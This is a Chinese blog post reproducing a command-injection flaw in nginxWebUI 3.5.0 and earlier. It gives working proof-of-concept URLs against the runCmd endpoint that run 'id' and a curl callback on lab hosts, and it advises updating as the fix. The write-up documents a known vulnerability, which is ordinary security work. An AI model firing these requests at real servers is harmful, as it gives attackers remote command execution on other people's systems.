声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。
0X01 简介
nginxWebUI是一款图形化管理nginx配置的工具, 可以使用网页来快速配置nginx的各项功能, 包括http协议转发, tcp协议转发, 反向代理, 负载均衡, 静态html服务器, ssl证书自动申请、续签、配置等, 配置好后可一键生成nginx.conf文件, 同时可控制nginx使用此文件进行启动与重载, 完成对nginx的图形化控制闭环。
nginxWebUI <= 3.5.0
运行命令:
java -jar -Dfile.encoding=UTF-8 nginxWebUI-3.5.0.jar --server.port=8080
(如果不设置编码网页容易出现乱码, 默认以8080端口启动)
0X02 复现环境
Windows:
Windows 10
192.168.245.134
java 11.0.20
Linux:
Ubuntu-22.04.1
192.168.245.135
openjdk 11.0.20
0X03 漏洞复现
http://IP地址/AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
Linux服务器:
http://192.168.245.135:8080/AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
Windows服务器:
Windows环境搭建的应用执行POC没有回显,在服务器内查看是执行成功。
验证可以通过dnslog等方式进行验证
http://127.0.0.1:8080/AdminPage/conf/runCmd?cmd=curl%20192.168.245.135:8080%26%26echo%20nginx
更新至最新版。
0X05 写在最后
原文始发于微信公众号(皓月的笔记本):【漏洞复现】nginxWebUI 命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论